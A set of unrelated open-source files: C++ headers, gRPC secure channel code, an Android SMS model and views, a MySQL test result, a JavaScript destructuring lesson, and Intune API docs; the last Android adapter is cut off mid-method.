    // used for xml and other tagged formats; default does nothing
    virtual void save_start(const char * name){
        ArchiveImplementation::save_start(name);
    }
    virtual void save_end(const char * name){
        ArchiveImplementation::save_end(name);
    }
    virtual void end_preamble(){
        ArchiveImplementation::end_preamble();
    }
    virtual void register_basic_serializer(const detail::basic_oserializer & bos){
        ArchiveImplementation::register_basic_serializer(bos);
    }
public:
    // these can't be inherited because they appear in multiple
    // parents
    typedef mpl::bool_<false> is_loading;
    typedef mpl::bool_<true> is_saving;
    // the << operator
    template<class T>
    polymorphic_oarchive & operator<<(T & t){
        return polymorphic_oarchive::operator<<(t);
    }
    // the & operator
    template<class T>
    polymorphic_oarchive & operator&(T & t){
        return polymorphic_oarchive::operator&(t);
    }
    // register type function
    template<class T>
    const basic_pointer_oserializer *
    register_type(T * t = NULL){
        return ArchiveImplementation::register_type(t);
    }
    // all current archives take a stream as constructor argument
    template <class _Elem, class _Tr>
    polymorphic_oarchive_route(
        std::basic_ostream<_Elem, _Tr> & os,
        unsigned int flags = 0
    ) :
        ArchiveImplementation(os, flags)
    {}
    virtual ~polymorphic_oarchive_route(){};
};
} // namespace detail
} // namespace archive
} // namespace boost
#ifdef BOOST_MSVC
#pragma warning(pop)
#endif
#include <boost/archive/detail/abi_suffix.hpp> // pops abi_suffix.hpp pragmas
#endif // BOOST_ARCHIVE_DETAIL_POLYMORPHIC_OARCHIVE_DISPATCH_HPP
| {
"pile_set_name": "Github"
} |
/*
* Copyright (C) 2017 Moez Bhatti <[email protected]>
*
* This file is part of QKSMS.
*
* QKSMS is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* QKSMS is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with QKSMS. If not, see <http://www.gnu.org/licenses/>.
*/
package com.moez.QKSMS.model
import android.content.ContentUris
import android.net.Uri
import android.provider.Telephony.*
import io.realm.RealmList
import io.realm.RealmObject
import io.realm.annotations.Index
import io.realm.annotations.PrimaryKey
/**
 * Realm model for a single SMS or MMS message.
 *
 * Property names/types are part of the Realm schema and of the public API,
 * so they are kept exactly as declared.
 */
open class Message : RealmObject() {

    enum class AttachmentType { TEXT, IMAGE, VIDEO, AUDIO, SLIDESHOW, NOT_LOADED }

    @PrimaryKey var id: Long = 0

    @Index var threadId: Long = 0

    // The MMS-SMS content provider can hand out duplicate ids because SMS and
    // MMS live in separate tables. Since [id] is our Realm primary key, the
    // provider's original row id is kept here so the source row can still be
    // looked up.
    var contentId: Long = 0

    var address: String = ""
    var boxId: Int = 0
    var type: String = ""
    var date: Long = 0
    var dateSent: Long = 0
    var seen: Boolean = false
    var read: Boolean = false
    var locked: Boolean = false
    var subId: Int = -1

    // SMS only
    var body: String = ""
    var errorCode: Int = 0
    var deliveryStatus: Int = Sms.STATUS_NONE

    // MMS only
    var attachmentTypeString: String = AttachmentType.NOT_LOADED.toString()
    var attachmentType: AttachmentType
        get() = AttachmentType.valueOf(attachmentTypeString)
        set(value) {
            attachmentTypeString = value.toString()
        }

    var mmsDeliveryStatusString: String = ""
    var readReportString: String = ""
    var errorType: Int = 0
    var messageSize: Int = 0
    var messageType: Int = 0
    var mmsStatus: Int = 0
    var subject: String = ""
    var textContentType: String = ""

    var parts: RealmList<MmsPart> = RealmList()

    /** Content-provider Uri of the backing SMS or MMS row. */
    fun getUri(): Uri =
            ContentUris.withAppendedId(
                    if (isMms()) Mms.CONTENT_URI else Sms.CONTENT_URI,
                    contentId)

    fun isMms(): Boolean {
        return type == "mms"
    }

    fun isSms(): Boolean {
        return type == "sms"
    }

    /** True when this message was sent by the local user. */
    fun isMe(): Boolean {
        val incoming = when {
            isMms() -> boxId == Mms.MESSAGE_BOX_INBOX || boxId == Mms.MESSAGE_BOX_ALL
            isSms() -> boxId == Sms.MESSAGE_TYPE_INBOX || boxId == Sms.MESSAGE_TYPE_ALL
            else -> false
        }
        return !incoming
    }

    /** True when the message sits in an outbox-like (or failed/queued) box. */
    fun isOutgoingMessage(): Boolean = when {
        isMms() -> boxId == Mms.MESSAGE_BOX_OUTBOX
        isSms() -> boxId == Sms.MESSAGE_TYPE_FAILED
                || boxId == Sms.MESSAGE_TYPE_OUTBOX
                || boxId == Sms.MESSAGE_TYPE_QUEUED
        else -> false
    }

    /**
     * Returns the text that should be copied to the clipboard.
     */
    fun getText(): String {
        if (isSms()) return body
        val pieces = mutableListOf<String>()
        for (part in parts) {
            if (part.type == "text/plain") {
                val text = part.text
                if (text != null) pieces.add(text)
            }
        }
        return pieces.joinToString(separator = "\n")
    }

    /**
     * Returns the text that should be displayed when a preview of the message
     * needs to be displayed, such as in the conversation view or in a
     * notification.
     */
    fun getSummary(): String {
        if (isSms()) return body
        val builder = StringBuilder()
        // Subject first, if it carries any information.
        val cleanSubject = getCleansedSubject()
        if (cleanSubject.isNotEmpty()) {
            builder.appendln(cleanSubject)
        }
        // Then one line per part that can describe itself.
        for (part in parts) {
            part.getSummary()?.let { builder.appendln(it) }
        }
        return builder.toString().trim()
    }

    /** Drops placeholder subjects so the UI doesn't have to show them. */
    fun getCleansedSubject(): String = when (subject) {
        "no subject", "NoSubject", "<not present>" -> ""
        else -> subject
    }

    fun isSending(): Boolean {
        return isOutgoingMessage() && !isFailedMessage()
    }

    fun isDelivered(): Boolean {
        // MMS delivery reports are not implemented yet (TODO in the original),
        // so only the SMS delivery status counts.
        return deliveryStatus == Sms.STATUS_COMPLETE
    }

    fun isFailedMessage(): Boolean {
        if (isMms()) {
            return errorType >= MmsSms.ERR_TYPE_GENERIC_PERMANENT ||
                    boxId == Mms.MESSAGE_BOX_FAILED
        }
        return isSms() && boxId == Sms.MESSAGE_TYPE_FAILED
    }

    /**
     * Two messages count as having the same sender when their direction and
     * SIM match — and, for incoming messages, the address as well.
     */
    fun compareSender(other: Message): Boolean {
        if (isMe() != other.isMe()) return false
        return if (isMe()) {
            subId == other.subId
        } else {
            subId == other.subId && address == other.address
        }
    }
}
"pile_set_name": "Github"
} |
#
# WL#9263 Independent compress/decompress of BLOB pages
#
set global innodb_compression_level = 0;
create table t1 (f1 int primary key, f2 longblob)
row_format=compressed, engine=innodb;
insert into t1 values (1, repeat('+', 40000));
set debug = '+d,lob_insert_single_zstream';
insert into t1 values (2, repeat('~', 40000));
set debug = '-d,lob_insert_single_zstream';
select f1, right(f2, 40) from t1;
f1 right(f2, 40)
1 ++++++++++++++++++++++++++++++++++++++++
2 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Kill and restart
select f1, right(f2, 40) from t1;
f1 right(f2, 40)
1 ++++++++++++++++++++++++++++++++++++++++
2 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
drop table t1;
set global innodb_compression_level = default;
| {
"pile_set_name": "Github"
} |
---
author: alexjmackey
type: normal
category: feature
links:
- >-
[Destructuring
Assignment](https://developer.mozilla.org/en/docs/Web/JavaScript/Reference/Operators/Destructuring_assignment){documentation}
---
# Destructuring (Part 1)
---
## Content
Destructuring provides a succinct and flexible way to assign values from arrays or objects.
This is best illustrated with an example. Destructuring is used below to assign `x` and `y` the values `100` and `200` in just one line of code:
```javascript
let x, y;
[x, y] = [100, 200];
// x = 100, y = 200
```
### Function Return Values
Destructuring works great with functions.
Let's say we have a function that multiplies two input arguments (x and y) by two and returns the result as an array.
Destructuring can assign the results of this operation to two variables with just one line of code:
```javascript
let x, y;
function dblNumbers(x, y) {
return [x * 2, y * 2];
}
[x, y] = dblNumbers(100, 200);
// x = 200, y = 400
```
### Swapping Variables
Destructuring can also be used to swap the contents of two variables without having to create another temporary variable:
```javascript
let x = 1;
let y = 2;
[y, x] = [x, y];
// x = 2, y = 1
```
---
## Practice
Swap `a` and `b` using destructuring:
```javascript
let a = 'foo'
let b = 'bar'
[a ???] = ???
console.log(a) // bar
console.log(b) // foo
```
- , b
- [b, a]
- [, a]
- a
- b
- , a
- [a]
- [b]
- [a, b]
- ,
---
## Revision
What will be the output of the following statements:
```javascript
function squareNums(nums) {
return nums.map(function(num) {
return num * num;
});
}
const [a, b] = squareNums([3, 4, 5]);
console.log(a);
// ???
console.log(b);
// ???
```
- 9
- 16
- error
- [9, 16]
- [16, 25]
- [9, 25]
- 25
- 0
- undefined
- null
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='DebugAPP|Win32'">
<LocalDebuggerCommand>F:\TGCSHARED\fpsc-reloaded\FPS Creator Files\FPSC-Proto-Game.exe</LocalDebuggerCommand>
<LocalDebuggerWorkingDirectory>F:\TGCSHARED\fpsc-reloaded\FPS Creator Files\</LocalDebuggerWorkingDirectory>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='DebugFPSC|Win32'">
<LocalDebuggerCommand>F:\TGCSHARED\fpsc-reloaded\FPS Creator Files\Guru-Game.exe</LocalDebuggerCommand>
<LocalDebuggerWorkingDirectory>F:\TGCSHARED\fpsc-reloaded\FPS Creator Files\</LocalDebuggerWorkingDirectory>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LocalDebuggerCommand>F:\TGCSHARED\fpsc-reloaded\FPS Creator Files\FPSC-Proto-Game.exe</LocalDebuggerCommand>
<LocalDebuggerWorkingDirectory>F:\TGCSHARED\fpsc-reloaded\FPS Creator Files\</LocalDebuggerWorkingDirectory>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
<PropertyGroup>
<ShowAllFiles>false</ShowAllFiles>
</PropertyGroup>
</Project> | {
"pile_set_name": "Github"
} |
package com.cnswan.draginviewpager.widget;
import android.content.Context;
import android.util.AttributeSet;
import android.view.LayoutInflater;
import com.cnswan.draginviewpager.R;
import com.cnswan.draginviewpager.utils.SizeUtils;
/**
 * {@link DragViewGroup} that fills itself with the {@code layout_drag_match}
 * layout, uses a 50dp minimum size, and starts in the "bottom open" state.
 *
 * Created by 00013259 on 2017/4/21.
 */
public class DragViewGroupMatch extends DragViewGroup {

    public DragViewGroupMatch(Context context) {
        super(context);
    }

    public DragViewGroupMatch(Context context, AttributeSet attrs) {
        super(context, attrs);
    }

    public DragViewGroupMatch(Context context, AttributeSet attrs, int defStyleAttr) {
        super(context, attrs, defStyleAttr);
    }

    @Override
    protected void init(Context context, AttributeSet attrs) {
        // Inflate our content before delegating, so the parent's init can find
        // the children it expects — NOTE(review): assumed from the call order;
        // confirm against DragViewGroup.init.
        LayoutInflater.from(context).inflate(R.layout.layout_drag_match, this, true);
        super.init(context, attrs);
        setMin(SizeUtils.dp2px(context, 50f)); // minimum visible size: 50dp
        setInitStatus(InitStatus.OPEN_BOTTOM); // start with the bottom panel open
    }
}
| {
"pile_set_name": "Github"
} |
/*
*
* Copyright 2015 gRPC authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
*/
#include <grpc/support/port_platform.h>
#include <grpc/grpc.h>
#include <string.h>
#include <grpc/support/alloc.h>
#include <grpc/support/string_util.h>
#include "src/core/ext/filters/client_channel/client_channel.h"
#include "src/core/ext/filters/client_channel/resolver_registry.h"
#include "src/core/ext/transport/chttp2/client/chttp2_connector.h"
#include "src/core/lib/channel/channel_args.h"
#include "src/core/lib/gprpp/memory.h"
#include "src/core/lib/iomgr/sockaddr_utils.h"
#include "src/core/lib/security/credentials/credentials.h"
#include "src/core/lib/security/security_connector/security_connector.h"
#include "src/core/lib/security/transport/target_authority_table.h"
#include "src/core/lib/slice/slice_hash_table.h"
#include "src/core/lib/slice/slice_internal.h"
#include "src/core/lib/surface/api_trace.h"
#include "src/core/lib/surface/channel.h"
#include "src/core/lib/uri/uri_parser.h"
namespace grpc_core {
// Client channel factory producing secure (credential-backed) chttp2
// channels and subchannels.
class Chttp2SecureClientChannelFactory : public ClientChannelFactory {
 public:
  // Builds a subchannel whose args have been augmented with a security
  // connector derived from the channel credentials.  Returns nullptr if the
  // secure args could not be created.
  Subchannel* CreateSubchannel(const grpc_channel_args* args) override {
    grpc_channel_args* new_args = GetSecureNamingChannelArgs(args);
    if (new_args == nullptr) {
      gpr_log(GPR_ERROR,
              "Failed to create channel args during subchannel creation.");
      return nullptr;
    }
    grpc_connector* connector = grpc_chttp2_connector_create();
    Subchannel* s = Subchannel::Create(connector, new_args);
    // NOTE(review): Subchannel::Create appears to take its own references on
    // the connector and args, so both are released here — confirm.
    grpc_connector_unref(connector);
    grpc_channel_args_destroy(new_args);
    return s;
  }

  // Creates a client channel for |target|, replacing/adding the
  // GRPC_ARG_SERVER_URI arg with the canonicalized target.  Returns nullptr
  // if |target| is null.
  grpc_channel* CreateChannel(const char* target,
                              const grpc_channel_args* args) override {
    if (target == nullptr) {
      gpr_log(GPR_ERROR, "cannot create channel with NULL target name");
      return nullptr;
    }
    // Add channel arg containing the server URI.
    UniquePtr<char> canonical_target =
        ResolverRegistry::AddDefaultPrefixIfNeeded(target);
    grpc_arg arg = grpc_channel_arg_string_create(
        const_cast<char*>(GRPC_ARG_SERVER_URI), canonical_target.get());
    // Remove any pre-existing server-URI arg rather than duplicating it.
    const char* to_remove[] = {GRPC_ARG_SERVER_URI};
    grpc_channel_args* new_args =
        grpc_channel_args_copy_and_add_and_remove(args, to_remove, 1, &arg, 1);
    grpc_channel* channel =
        grpc_channel_create(target, new_args, GRPC_CLIENT_CHANNEL, nullptr);
    grpc_channel_args_destroy(new_args);
    return channel;
  }

 private:
  // Returns a copy of |args| extended with GRPC_ARG_DEFAULT_AUTHORITY (if
  // absent) and a security connector built from the credentials found in
  // |args|.  Returns nullptr if the credentials are missing, a connector is
  // already present, or connector creation fails.  Caller owns the result.
  static grpc_channel_args* GetSecureNamingChannelArgs(
      const grpc_channel_args* args) {
    grpc_channel_credentials* channel_credentials =
        grpc_channel_credentials_find_in_args(args);
    if (channel_credentials == nullptr) {
      gpr_log(GPR_ERROR,
              "Can't create subchannel: channel credentials missing for secure "
              "channel.");
      return nullptr;
    }
    // Make sure security connector does not already exist in args.
    if (grpc_security_connector_find_in_args(args) != nullptr) {
      gpr_log(GPR_ERROR,
              "Can't create subchannel: security connector already present in "
              "channel args.");
      return nullptr;
    }
    // To which address are we connecting? By default, use the server URI.
    const grpc_arg* server_uri_arg =
        grpc_channel_args_find(args, GRPC_ARG_SERVER_URI);
    const char* server_uri_str = grpc_channel_arg_get_string(server_uri_arg);
    GPR_ASSERT(server_uri_str != nullptr);
    grpc_uri* server_uri =
        grpc_uri_parse(server_uri_str, true /* suppress errors */);
    GPR_ASSERT(server_uri != nullptr);
    const TargetAuthorityTable* target_authority_table =
        FindTargetAuthorityTableInArgs(args);
    UniquePtr<char> authority;
    if (target_authority_table != nullptr) {
      // Find the authority for the target.
      const char* target_uri_str =
          Subchannel::GetUriFromSubchannelAddressArg(args);
      grpc_uri* target_uri =
          grpc_uri_parse(target_uri_str, false /* suppress errors */);
      GPR_ASSERT(target_uri != nullptr);
      if (target_uri->path[0] != '\0') {  // "path" may be empty
        // Strip a leading '/' before looking the target up in the table.
        const grpc_slice key = grpc_slice_from_static_string(
            target_uri->path[0] == '/' ? target_uri->path + 1
                                       : target_uri->path);
        const UniquePtr<char>* value = target_authority_table->Get(key);
        if (value != nullptr) authority.reset(gpr_strdup(value->get()));
        grpc_slice_unref_internal(key);
      }
      grpc_uri_destroy(target_uri);
    }
    // If the authority hasn't already been set (either because no target
    // authority table was present or because the target was not present
    // in the table), fall back to using the original server URI.
    if (authority == nullptr) {
      authority = ResolverRegistry::GetDefaultAuthority(server_uri_str);
    }
    grpc_arg args_to_add[2];
    size_t num_args_to_add = 0;
    if (grpc_channel_args_find(args, GRPC_ARG_DEFAULT_AUTHORITY) == nullptr) {
      // If the channel args don't already contain GRPC_ARG_DEFAULT_AUTHORITY,
      // add the arg, setting it to the value just obtained.
      args_to_add[num_args_to_add++] = grpc_channel_arg_string_create(
          const_cast<char*>(GRPC_ARG_DEFAULT_AUTHORITY), authority.get());
    }
    grpc_channel_args* args_with_authority =
        grpc_channel_args_copy_and_add(args, args_to_add, num_args_to_add);
    grpc_uri_destroy(server_uri);
    // Create the security connector using the credentials and target name.
    grpc_channel_args* new_args_from_connector = nullptr;
    RefCountedPtr<grpc_channel_security_connector>
        subchannel_security_connector =
            channel_credentials->create_security_connector(
                /*call_creds=*/nullptr, authority.get(), args_with_authority,
                &new_args_from_connector);
    if (subchannel_security_connector == nullptr) {
      gpr_log(GPR_ERROR,
              "Failed to create secure subchannel for secure name '%s'",
              authority.get());
      grpc_channel_args_destroy(args_with_authority);
      return nullptr;
    }
    // Pack the connector into an arg; the arg holds its own ref, so the
    // local RefCountedPtr can be dropped afterwards.
    grpc_arg new_security_connector_arg =
        grpc_security_connector_to_arg(subchannel_security_connector.get());
    grpc_channel_args* new_args = grpc_channel_args_copy_and_add(
        new_args_from_connector != nullptr ? new_args_from_connector
                                           : args_with_authority,
        &new_security_connector_arg, 1);
    subchannel_security_connector.reset(DEBUG_LOCATION, "lb_channel_create");
    if (new_args_from_connector != nullptr) {
      grpc_channel_args_destroy(new_args_from_connector);
    }
    grpc_channel_args_destroy(args_with_authority);
    return new_args;
  }
};
namespace {

// Process-wide factory singleton, created lazily on first use and
// intentionally never destroyed.
grpc_core::Chttp2SecureClientChannelFactory* g_factory;
gpr_once g_factory_once = GPR_ONCE_INIT;

// gpr_once initializer that allocates the singleton factory.
void FactoryInit() {
  g_factory = grpc_core::New<grpc_core::Chttp2SecureClientChannelFactory>();
}

}  // namespace
// Create a secure client channel:
// Asynchronously: - resolve target
//                 - connect to it (trying alternatives as presented)
//                 - perform handshakes
//
// Returns a "lame" channel (one that fails every call with INTERNAL) when
// |creds| is null or channel creation fails — never nullptr.
grpc_channel* grpc_secure_channel_create(grpc_channel_credentials* creds,
                                         const char* target,
                                         const grpc_channel_args* args,
                                         void* reserved) {
  grpc_core::ExecCtx exec_ctx;
  GRPC_API_TRACE(
      "grpc_secure_channel_create(creds=%p, target=%s, args=%p, "
      "reserved=%p)",
      4, ((void*)creds, target, (void*)args, (void*)reserved));
  GPR_ASSERT(reserved == nullptr);
  grpc_channel* channel = nullptr;
  if (creds != nullptr) {
    // Add channel args containing the client channel factory and channel
    // credentials.
    gpr_once_init(&g_factory_once, FactoryInit);
    grpc_arg args_to_add[] = {
        grpc_core::ClientChannelFactory::CreateChannelArg(g_factory),
        grpc_channel_credentials_to_arg(creds)};
    grpc_channel_args* new_args = grpc_channel_args_copy_and_add(
        args, args_to_add, GPR_ARRAY_SIZE(args_to_add));
    // Give the credentials a chance to rewrite the args; semantics depend on
    // the concrete credentials type.
    new_args = creds->update_arguments(new_args);
    // Create channel.
    channel = g_factory->CreateChannel(target, new_args);
    // Clean up.
    grpc_channel_args_destroy(new_args);
  }
  return channel != nullptr ? channel
                            : grpc_lame_client_channel_create(
                                  target, GRPC_STATUS_INTERNAL,
                                  "Failed to create secure client channel");
}
| {
"pile_set_name": "Github"
} |
---
title: "iosDeviceFeaturesConfiguration resource type"
description: "iOS Device Features Configuration Profile."
author: "dougeby"
localization_priority: Normal
ms.prod: "intune"
doc_type: resourcePageType
---
# iosDeviceFeaturesConfiguration resource type
Namespace: microsoft.graph
> **Note:** The Microsoft Graph API for Intune requires an [active Intune license](https://go.microsoft.com/fwlink/?linkid=839381) for the tenant.
iOS Device Features Configuration Profile.
Inherits from [appleDeviceFeaturesConfigurationBase](../resources/intune-deviceconfig-appledevicefeaturesconfigurationbase.md)
## Methods
|Method|Return Type|Description|
|:---|:---|:---|
|[List iosDeviceFeaturesConfigurations](../api/intune-deviceconfig-iosdevicefeaturesconfiguration-list.md)|[iosDeviceFeaturesConfiguration](../resources/intune-deviceconfig-iosdevicefeaturesconfiguration.md) collection|List properties and relationships of the [iosDeviceFeaturesConfiguration](../resources/intune-deviceconfig-iosdevicefeaturesconfiguration.md) objects.|
|[Get iosDeviceFeaturesConfiguration](../api/intune-deviceconfig-iosdevicefeaturesconfiguration-get.md)|[iosDeviceFeaturesConfiguration](../resources/intune-deviceconfig-iosdevicefeaturesconfiguration.md)|Read properties and relationships of the [iosDeviceFeaturesConfiguration](../resources/intune-deviceconfig-iosdevicefeaturesconfiguration.md) object.|
|[Create iosDeviceFeaturesConfiguration](../api/intune-deviceconfig-iosdevicefeaturesconfiguration-create.md)|[iosDeviceFeaturesConfiguration](../resources/intune-deviceconfig-iosdevicefeaturesconfiguration.md)|Create a new [iosDeviceFeaturesConfiguration](../resources/intune-deviceconfig-iosdevicefeaturesconfiguration.md) object.|
|[Delete iosDeviceFeaturesConfiguration](../api/intune-deviceconfig-iosdevicefeaturesconfiguration-delete.md)|None|Deletes a [iosDeviceFeaturesConfiguration](../resources/intune-deviceconfig-iosdevicefeaturesconfiguration.md).|
|[Update iosDeviceFeaturesConfiguration](../api/intune-deviceconfig-iosdevicefeaturesconfiguration-update.md)|[iosDeviceFeaturesConfiguration](../resources/intune-deviceconfig-iosdevicefeaturesconfiguration.md)|Update the properties of a [iosDeviceFeaturesConfiguration](../resources/intune-deviceconfig-iosdevicefeaturesconfiguration.md) object.|
## Properties
|Property|Type|Description|
|:---|:---|:---|
|id|String|Key of the entity. Inherited from [deviceConfiguration](../resources/intune-deviceconfig-deviceconfiguration.md)|
|lastModifiedDateTime|DateTimeOffset|DateTime the object was last modified. Inherited from [deviceConfiguration](../resources/intune-deviceconfig-deviceconfiguration.md)|
|createdDateTime|DateTimeOffset|DateTime the object was created. Inherited from [deviceConfiguration](../resources/intune-deviceconfig-deviceconfiguration.md)|
|description|String|Admin provided description of the Device Configuration. Inherited from [deviceConfiguration](../resources/intune-deviceconfig-deviceconfiguration.md)|
|displayName|String|Admin provided name of the device configuration. Inherited from [deviceConfiguration](../resources/intune-deviceconfig-deviceconfiguration.md)|
|version|Int32|Version of the device configuration. Inherited from [deviceConfiguration](../resources/intune-deviceconfig-deviceconfiguration.md)|
|assetTagTemplate|String|Asset tag information for the device, displayed on the login window and lock screen.|
|lockScreenFootnote|String|A footnote displayed on the login window and lock screen. Available in iOS 9.3.1 and later.|
|homeScreenDockIcons|[iosHomeScreenItem](../resources/intune-deviceconfig-ioshomescreenitem.md) collection|A list of app and folders to appear on the Home Screen Dock. This collection can contain a maximum of 500 elements.|
|homeScreenPages|[iosHomeScreenPage](../resources/intune-deviceconfig-ioshomescreenpage.md) collection|A list of pages on the Home Screen. This collection can contain a maximum of 500 elements.|
|notificationSettings|[iosNotificationSettings](../resources/intune-deviceconfig-iosnotificationsettings.md) collection|Notification settings for each bundle id. Applicable to devices in supervised mode only (iOS 9.3 and later). This collection can contain a maximum of 500 elements.|
## Relationships
|Relationship|Type|Description|
|:---|:---|:---|
|assignments|[deviceConfigurationAssignment](../resources/intune-deviceconfig-deviceconfigurationassignment.md) collection|The list of assignments for the device configuration profile. Inherited from [deviceConfiguration](../resources/intune-deviceconfig-deviceconfiguration.md)|
|deviceStatuses|[deviceConfigurationDeviceStatus](../resources/intune-deviceconfig-deviceconfigurationdevicestatus.md) collection|Device configuration installation status by device. Inherited from [deviceConfiguration](../resources/intune-deviceconfig-deviceconfiguration.md)|
|userStatuses|[deviceConfigurationUserStatus](../resources/intune-deviceconfig-deviceconfigurationuserstatus.md) collection|Device configuration installation status by user. Inherited from [deviceConfiguration](../resources/intune-deviceconfig-deviceconfiguration.md)|
|deviceStatusOverview|[deviceConfigurationDeviceOverview](../resources/intune-deviceconfig-deviceconfigurationdeviceoverview.md)|Device Configuration devices status overview Inherited from [deviceConfiguration](../resources/intune-deviceconfig-deviceconfiguration.md)|
|userStatusOverview|[deviceConfigurationUserOverview](../resources/intune-deviceconfig-deviceconfigurationuseroverview.md)|Device Configuration users status overview Inherited from [deviceConfiguration](../resources/intune-deviceconfig-deviceconfiguration.md)|
|deviceSettingStateSummaries|[settingStateDeviceSummary](../resources/intune-deviceconfig-settingstatedevicesummary.md) collection|Device Configuration Setting State Device Summary Inherited from [deviceConfiguration](../resources/intune-deviceconfig-deviceconfiguration.md)|
## JSON Representation
Here is a JSON representation of the resource.
<!-- {
"blockType": "resource",
"keyProperty": "id",
"@odata.type": "microsoft.graph.iosDeviceFeaturesConfiguration"
}
-->
``` json
{
"@odata.type": "#microsoft.graph.iosDeviceFeaturesConfiguration",
"id": "String (identifier)",
"lastModifiedDateTime": "String (timestamp)",
"createdDateTime": "String (timestamp)",
"description": "String",
"displayName": "String",
"version": 1024,
"assetTagTemplate": "String",
"lockScreenFootnote": "String",
"homeScreenDockIcons": [
{
"@odata.type": "microsoft.graph.iosHomeScreenItem",
"displayName": "String",
"pages": [
{
"@odata.type": "microsoft.graph.iosHomeScreenFolderPage",
"displayName": "String",
"apps": [
{
"@odata.type": "microsoft.graph.iosHomeScreenApp",
"displayName": "String",
"bundleID": "String"
}
]
}
]
}
],
"homeScreenPages": [
{
"@odata.type": "microsoft.graph.iosHomeScreenPage",
"displayName": "String",
"icons": [
{
"@odata.type": "microsoft.graph.iosHomeScreenItem",
"displayName": "String",
"pages": [
{
"@odata.type": "microsoft.graph.iosHomeScreenFolderPage",
"displayName": "String",
"apps": [
{
"@odata.type": "microsoft.graph.iosHomeScreenApp",
"displayName": "String",
"bundleID": "String"
}
]
}
]
}
]
}
],
"notificationSettings": [
{
"@odata.type": "microsoft.graph.iosNotificationSettings",
"bundleID": "String",
"appName": "String",
"publisher": "String",
"enabled": true,
"showInNotificationCenter": true,
"showOnLockScreen": true,
"alertType": "String",
"badgesEnabled": true,
"soundsEnabled": true
}
]
}
```
| {
"pile_set_name": "Github"
} |
/*******************************************************************************
* Copyright (c) 2015 btows.com.
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
******************************************************************************/
package com.cleanwiz.applock.ui.adapter;
import android.content.Context;
import android.content.pm.ApplicationInfo;
import android.content.pm.PackageManager;
import android.content.pm.PackageManager.NameNotFoundException;
import android.graphics.Bitmap;
import android.graphics.BitmapFactory;
import android.text.TextUtils;
import android.util.Log;
import android.view.Gravity;
import android.view.LayoutInflater;
import android.view.View;
import android.view.ViewGroup;
import android.view.ViewGroup.LayoutParams;
import android.widget.BaseAdapter;
import android.widget.ImageView;
import android.widget.PopupWindow;
import android.widget.RelativeLayout;
import android.widget.TextView;
import com.cleanwiz.applock.R;
import com.cleanwiz.applock.data.LookMyPrivate;
import com.cleanwiz.applock.utils.LogUtil;
import com.gc.materialdesign.views.LayoutRipple;
import java.text.SimpleDateFormat;
import java.util.List;
public class AppLookMyPrivateAdapter extends BaseAdapter {
public List<LookMyPrivate> looMyPrivates;
private Context context;
private LayoutInflater mInflater;
private PackageManager packageManager;
private SimpleDateFormat dFormat = new SimpleDateFormat(
"yyyy.MM.dd HH:mm:ss");
public AppLookMyPrivateAdapter(List<LookMyPrivate> looMyPrivates,
Context context) {
this.looMyPrivates = looMyPrivates;
this.context = context;
this.mInflater = LayoutInflater.from(context);
packageManager = context.getPackageManager();
}
@Override
public int getCount() {
// TODO Auto-generated method stub
LogUtil.e("colin", "count:" + looMyPrivates.size());
return looMyPrivates.size();
}
@Override
public Object getItem(int position) {
// TODO Auto-generated method stub
return looMyPrivates.get(position);
}
@Override
public long getItemId(int position) {
// TODO Auto-generated method stub
return position;
}
@Override
public View getView(int position, View convertView, final ViewGroup parent) {
// TODO Auto-generated method stub
ViewHolder viewHolder = null;
if (convertView == null) {
viewHolder = new ViewHolder();
convertView = mInflater.inflate(R.layout.item_lookmyprivate, null);
viewHolder.headerImageView = (ImageView) convertView
.findViewById(R.id.lookmyprivate_headerimage);
viewHolder.dateTextView = (TextView) convertView
.findViewById(R.id.lookmyprivate_datestring);
viewHolder.detailTextView = (TextView) convertView
.findViewById(R.id.lookmyprivate_detailstring);
viewHolder.ripple = (RelativeLayout) convertView
.findViewById(R.id.layout_item);
convertView.setTag(viewHolder);
} else {
viewHolder = (ViewHolder) convertView.getTag();
}
if (viewHolder != null) {
LookMyPrivate lookMyPrivate = looMyPrivates.get(position);
if (lookMyPrivate != null) {
if (TextUtils.isEmpty(lookMyPrivate.getPicPath())) {
viewHolder.headerImageView
.setImageResource(R.drawable.default_avatar);
viewHolder.headerImageView.setOnClickListener(null);
} else {
final Bitmap bm = BitmapFactory.decodeFile(lookMyPrivate
.getPicPath());
viewHolder.headerImageView.setImageBitmap(bm);
viewHolder.ripple
.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
ImageView imageView = new ImageView(context);
imageView.setImageBitmap(bm);
final PopupWindow popupWindow = new PopupWindow(
imageView,
LayoutParams.WRAP_CONTENT,
LayoutParams.WRAP_CONTENT, true);
popupWindow.setOutsideTouchable(true);
